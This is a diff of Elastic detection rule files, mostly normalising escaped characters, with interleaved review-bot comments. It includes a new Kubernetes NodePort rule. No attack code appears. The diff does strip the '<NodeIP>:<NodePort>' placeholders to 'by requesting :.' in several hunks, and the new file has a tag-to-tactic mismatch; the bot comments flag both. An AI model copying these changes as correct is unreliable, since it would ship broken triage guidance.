diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json
index bd69ba7789a..37f7477166b 100644
--- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json
index 6142f358802..0cb4447f1d8 100644
--- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json
index 32dd2ce0cb2..4d379cfb64d 100644
--- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json
index b37c69a386a..928a826f742 100644
--- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json
index 548359d1e91..646cfe9f9ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json
index 3343f889fd0..a9e335a1362 100644
--- a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json
+++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json
@@ -5,7 +5,7 @@ ], "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", "false_positives": [ - "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting \u003cNodeIP\u003e:\u003cNodePort\u003e. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. 
NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." ], "index": [ "logs-kubernetes.*" @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json index aa270c71233..7efc108117b 100644 --- a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json +++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json 
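Review bot: The new `false_positives` string in the `@@ -5,7 +5,7 @@` hunk now reads `by requesting :.` — the `\u003cNodeIP\u003e:\u003cNodePort\u003e` placeholders were not decoded to `<NodeIP>:<NodePort>` but dropped outright, which looks like an HTML-tag strip run after the unescape rather than a plain `\u003c`→`<` decode (the `\u003c8.2` in 661545b4's `setup` below survives as `<8.2` because `<8` is not tag-shaped). The same truncated sentence appears in the 65f9bccd _202 hunk and is baked into the new _203 file, so the shipped rule's triage guidance loses the one concrete example it gives analysts. The line should read `by requesting <NodeIP>:<NodePort>.`, and the rest of the diff deserves a pass for any other `\u003c…\u003e` span on the old side that has no `<…>` counterpart on the new side.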
@@ -5,7 +5,7 @@ ], "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", "false_positives": [ - "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting \u003cNodeIP\u003e:\u003cNodePort\u003e. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. 
NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." ], "index": [ "logs-kubernetes.*" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json new file mode 100644 index 00000000000..a26e5ca6752 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json 
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.",
+ "false_positives": [
+ "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Exposed Service Created With Type NodePort",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"services\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.type:\"NodePort\"\n",
+ "references": [
+ "https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types",
+ "https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport",
+ "https://www.tigera.io/blog/new-vulnerability-exposes-kubernetes-to-man-in-the-middle-attacks-heres-how-to-mitigate/"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "65f9bccd-510b-40df-8263-334f03174fed",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Persistence"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1133",
+ "name": "External Remote Services",
+ 
"reference": "https://attack.mitre.org/techniques/T1133/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "65f9bccd-510b-40df-8263-334f03174fed_203",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json
index 21d2a5d6c80..1c6a32ed6fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 21,
 "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json
index f003dfd6ff6..d8214bc7e19 100644
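Review bot: In the new 65f9bccd…_203 file, `tags` carries `"Tactic: Execution"` but the `threat` array maps only TA0003 (Persistence), so the Execution tag has no ATT&CK entry behind it and will not line up with the tactic filters built from `threat`; this is presumably inherited from _202, but a fresh version is the place to fix it — either drop the tag or add a second `threat` entry for TA0002 (Execution), as the 64cfca9e rules on this page do. `"note": ""` also ships a medium-severity rule with no investigation guide; a short triage note on separating documented or CI-driven NodePort exposure from unexpected changes (who issued the `create`/`update`/`patch`, whether the service and namespace are known) would give analysts something to act on. The file also ends without a trailing newline.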
--- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 21,
 "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json
index 1bd98a1487f..fa22d26abe4 100644
--- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 21,
 "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json
index 900909261bb..b1c20197397 100644
--- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 21,
 "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json
index 9572bdcc34a..d0731738015 100644
--- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json
index 1095c196262..52e42a9e08f 100644
--- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json
index 10afe8ef6b4..a75cb6ae330 100644
--- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json
index 580cf8b5350..df005687dec 100644
--- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json
index f3122b5c263..5eb7387cd43 100644
--- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json
index 6ab86becddb..1032b032943 100644
--- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json
index e1d2ea38c9f..52754b891fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json
@@ -40,7 +40,7 @@
 ],
 "risk_score": 47,
 "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json
index 6d28fa9ced1..c29cdd1534b 100644
--- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json
@@ -40,7 +40,7 @@
 ],
 "risk_score": 47,
 "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json
index 007d8c9f5fb..2949ba48fb7 100644
--- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json
@@ -40,7 +40,7 @@
 ],
 "risk_score": 47,
 "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json
index 53e6b66082a..dff3dd4ac65 100644
--- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json
@@ -39,7 +39,7 @@
 ],
 "risk_score": 47,
 "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json
index 6cda25778c1..02de4662ef2 100644
--- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Successful Linux FTP Brute Force Attack Detected", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd 